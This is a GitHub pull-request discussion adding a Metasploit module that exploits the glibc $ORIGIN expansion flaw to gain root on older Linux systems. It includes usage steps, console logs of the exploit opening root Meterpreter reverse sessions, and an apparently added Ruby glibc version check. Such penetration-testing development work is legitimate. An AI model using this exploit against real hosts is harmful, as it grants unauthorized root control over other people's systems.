
Add glibc $ORIGIN Expansion Privilege Escalation exploit #9467

Closed

Conversation

@bcoles
Contributor

bcoles commented Jan 27, 2018

Add glibc $ORIGIN Expansion Privilege Escalation exploit.

    This module attempts to gain root privileges on Linux systems by abusing
    a vulnerability in the GNU C Library (glibc) dynamic linker.

    glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
    properly restrict use of the LD_AUDIT environment variable when loading
    setuid executables which allows control over the $ORIGIN library search
    path resulting in execution of arbitrary shared objects.

    This module opens a file descriptor to the specified suid executable via
    a hard link, then replaces the hard link with a shared object before
    instructing the linker to execute the file descriptor, resulting in
    arbitrary code execution.

    The specified setuid binary must be readable and located on the same
    file system partition as the specified writable directory.

    This module has been tested successfully on glibc version 2.5 on CentOS
    5.4 (x86_64), 2.5 on CentOS 5.5 (x86_64) and 2.12 on Fedora 13 (i386).

    RHEL 5 is reportedly affected, but untested. Some versions of ld.so
    hit a failed assertion in dl_open_worker causing exploitation to fail.

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/glibc_origin_expansion_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf5 exploit(multi/handler) > use exploit/linux/local/glibc_origin_expansion_priv_esc 
msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[+] The target appears to be vulnerable
[*] Using target: Linux x86
[*] Writing '/tmp/.R5Ork' (1279 bytes) ...
[*] Writing '/tmp/.yE35DWbLd' (320 bytes) ...
[*] Writing '/tmp/.sk7Z3Vl7vJ' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (857352 bytes) to 172.16.191.138
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.138:59187) at 2018-01-27 04:21:24 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : fedora13.localdomain
OS           : Fedora 13 (Linux 2.6.33.3-85.fc13.i686.PAE)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
@wvu-r7
Member

wvu-r7 commented Jan 28, 2018

This one's a "classic" fave! ;)

@bcoles bcoles added the delayed label Feb 1, 2018
@bcoles
Contributor Author

bcoles commented Feb 1, 2018

Delayed pending fix for #9482

@bcoles bcoles added docs and removed needs-docs labels Feb 3, 2018
@bcoles bcoles removed the delayed label Feb 7, 2018
@h00die h00die self-assigned this Feb 9, 2018
@h00die
Contributor

h00die commented Feb 9, 2018

Ubuntu 10.04 x64

msf exploit(linux/local/glibc_origin_expansion_priv_esc) > set verbose 1
verbose => true
msf exploit(linux/local/glibc_origin_expansion_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.11.1 is vulnerable
[-] Exploit failed: NoMethodError undefined method `setuid?' for #<Msf::Modules::Mod6578706c6f69742f6c696e75782f6c6f63616c2f676c6962635f6f726967696e5f657870616e73696f6e5f707269765f657363::MetasploitModule:0x0000562a6e7543d0>
Did you mean?  setup
[*] Exploit completed, but no session was created.
@bcoles
Contributor Author

bcoles commented Feb 9, 2018

@h00die setuid? was added to lib/msf/core/post/file.rb a couple of weeks ago in #9446.

Edit: Yeah, this didn't work on Ubuntu. It hit a failed assertion in dl_open_worker.

@h00die
Contributor

h00die commented Feb 9, 2018

Did a rebase; it compiles now.
Ubuntu 10.04 x64 should be vuln according to the docs that are linked, but it killed my original session for me.

msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.11.1 is vulnerable
[+] /bin/ping is setuid
[+] /bin/ping is readable
[+] The target appears to be vulnerable
[+] '/bin/ping' and '/tmp' are located on the same partition
[*] System architecture is x86_64
[*] Using target: Linux x64
[*] Writing '/tmp/.igpZGagV' (1913 bytes) ...
[*] Max line length is 65537
[*] Writing 1913 bytes in 1 chunks of 4371 bytes (octal-encoded), using printf
[*] Writing '/tmp/.yxtnoClTtS' (311 bytes) ...
[*] Max line length is 65537
[*] Writing 311 bytes in 1 chunks of 1093 bytes (octal-encoded), using printf
[*] Writing '/tmp/.5O3IOFVyX' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] 2.2.2.2 - Command shell session 1 closed.  Reason: Died from EOFError
[*] 2.2.2.2 - Command shell session 1 closed.
[-] Failed to delete /tmp/.igpZGagV: closed stream
[-] Failed to delete /tmp/.yxtnoClTtS: closed stream
[-] Failed to delete /tmp/.PZuXhOp: closed stream
[-] Failed to delete /tmp/.5O3IOFVyX: closed stream
[*] Exploit completed, but no session was created.

(waiting on my centos 5.5 to finish downloading)

@h00die
Contributor

h00die commented Feb 9, 2018

Since the check worked out correctly, the local exploit suggester may suggest it. Maybe add in a check to fail on Ubuntu?

@bcoles
Contributor Author

bcoles commented Feb 9, 2018

I'm hesitant to fail on all versions of Ubuntu. As you suggest, documentation suggests that Ubuntu is affected.

Killing the session is bad. I might have to implement the same workaround as the other glibc module:

    # The echo at the end of the command is required
    # else the original session may die
    output = cmd_exec "#{exp_path}& echo "

This only seems to be necessary for shell sessions.

@h00die
Contributor

h00die commented Feb 9, 2018

I have to do some ESX patching, then get CentOS 5.5 installed, so you've got a little time to test changes.

@bcoles
Contributor Author

bcoles commented Feb 9, 2018

Latest commit seems to have fixed premature session termination for shell sessions on Ubuntu.

As for the check - the module currently returns CheckCode::Appears as the highest level of certainty, which seems appropriate, but I could add a fallback to CheckCode::Detected for Ubuntu if you think that would be better.

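An added check, not the module's own code, that encodes the affected glibc ranges from the PR description and the CheckCode::Appears / CheckCode::Detected fallback for Ubuntu discussed above; it parses a constructed `ldd --version` banner and returns this example's own verdict symbols rather than Metasploit constants.

```ruby
require 'rubygems' # Gem::Version does the dotted-version comparison

# Pull the dotted glibc version out of the first line of `ldd --version`
# output, e.g. "ldd (GNU libc) 2.12" or the Ubuntu EGLIBC banner form.
def parse_glibc_version(ldd_banner)
  first = ldd_banner.lines.first.to_s
  m = first.match(/(\d+\.\d+(?:\.\d+)?)\s*$/)
  m && m[1]
end

# True when the version lies in an affected range from the PR description:
# anything before 2.11.3, or 2.12.x before 2.12.2.
def glibc_origin_vulnerable?(version)
  v = Gem::Version.new(version.to_s)
  return true if v < Gem::Version.new('2.11.3')
  v >= Gem::Version.new('2.12') && v < Gem::Version.new('2.12.2')
rescue ArgumentError
  false # malformed version string: do not claim vulnerability
end

# Verdict symbols are this example's own stand-ins for Metasploit CheckCodes:
#   :safe     - version outside the affected ranges
#   :appears  - version inside the ranges (CheckCode::Appears)
#   :detected - inside the ranges but on Ubuntu, where the thread reports the
#               library is affected yet exploitation trips a dl_open_worker
#               assertion, so confidence is lowered (CheckCode::Detected)
#   :unknown  - no version could be parsed from the banner
def glibc_origin_check(ldd_banner, distro)
  version = parse_glibc_version(ldd_banner)
  return :unknown if version.nil?
  return :safe unless glibc_origin_vulnerable?(version)
  distro.to_s.downcase.include?('ubuntu') ? :detected : :appears
end

# Constructed sample banners (not captured from real hosts).
SAMPLE_FEDORA13 = "ldd (GNU libc) 2.12\nCopyright (C) 2010 Free Software Foundation, Inc.\n"
SAMPLE_UBUNTU1004 = "ldd (Ubuntu EGLIBC 2.11.1-0ubuntu7) 2.11.1\n"
SAMPLE_PATCHED = "ldd (GNU libc) 2.17\n"

if __FILE__ == $PROGRAM_NAME
  puts "Fedora 13:    #{glibc_origin_check(SAMPLE_FEDORA13, 'Fedora')}"
  puts "Ubuntu 10.04: #{glibc_origin_check(SAMPLE_UBUNTU1004, 'Ubuntu')}"
  puts "Patched:      #{glibc_origin_check(SAMPLE_PATCHED, 'CentOS')}"
end
```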
@h00die
Contributor

h00die commented Feb 9, 2018

CentOS 5.5 doesn't play nice on my ESXi: no mouse, no NIC, and that was as far as I cared to go. Switching to Fedora 13, hopefully better results.

@h00die
Contributor

h00die commented Feb 9, 2018

Confirmed the Ubuntu session is no longer killed.

@bcoles
Contributor Author

bcoles commented Feb 9, 2018

Excellent. The premature termination of shell sessions upon backgrounding a program during a cmd_exec call is possibly (likely?) a bug with cmd_exec. I haven't had time to investigate and create an issue on the tracker, but the issue only seems to appear on shell sessions, and only on old *nix systems.

@h00die
Contributor

h00die commented Feb 10, 2018

Fedora 13 was a good test.

msf5 exploit(linux/local/glibc_origin_expansion_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.12 is vulnerable
[+] /bin/ping is setuid
[+] /bin/ping is readable
[+] The target appears to be vulnerable
[+] '/bin/ping' and '/tmp' are located on the same partition
[*] System architecture is x86_64
[*] Using target: Linux x64
[*] Writing '/tmp/.GGqazPNz8' (1913 bytes) ...
[*] Max line length is 65537
[*] Writing 1913 bytes in 1 chunks of 4366 bytes (octal-encoded), using printf
[*] Writing '/tmp/.t7vLjiShY' (332 bytes) ...
[*] Max line length is 65537
[*] Writing 332 bytes in 1 chunks of 1148 bytes (octal-encoded), using printf
[*] Writing '/tmp/.y7OwDC' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 192.168.2.32
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:56281) at 2018-02-10 07:01:50 -0500
[+] Deleted /tmp/.t7vLjiShY
[+] Deleted /tmp/.SBC8HlI13
[+] Deleted /tmp/.y7OwDC

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Fedora 13 (Linux 2.6.33.3-85.fc13.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
@h00die
Contributor

h00die commented Feb 10, 2018

Also good on meterp for Fedora 13.

h00die added a commit that referenced this pull request Feb 10, 2018

@h00die


h00die commented Feb 10, 2018

Merged this; not sure why (unless it's just delayed) it's still saying open....

It may be worth throwing in a comment to the docs about Ubuntu being vulnerable, but the exploit not working against it. Figured that could be a quick add to the docs, and didn't want to hold this up any longer over a one liner.

@h00die
Contributor

h00die commented Feb 10, 2018

Release Notes

The exploits/linux/local/glibc_origin_expansion_priv_esc module has been added to the framework. This module abuses a vulnerability in the GNU C Library (glibc) dynamic linker on older (Fedora 13, CentOS 5.5) operating systems for privilege escalation.

@h00die
Contributor

h00die commented Feb 10, 2018

Ah, I think yesterday I may have done a rebase to get that setuid? function, but I may have messed it up, which may have messed up linking the merge correctly.

@bcoles bcoles closed this Feb 10, 2018
@bcoles bcoles deleted the bcoles:glibc_origin_expansion_priv_esc branch Feb 10, 2018
@bcoles
Contributor Author

bcoles commented Feb 11, 2018

Thanks. Yeah I'd say that's what happened.

I'm not sure if it's best practice for a PR author to rebase within a PR? It would drag the merge into master. Not a big deal I guess.

I'll create a separate PR for the minor doco updates.

Closed this PR.

jmartin-r7 added a commit to jmartin-r7/metasploit-framework that referenced this pull request Feb 12, 2018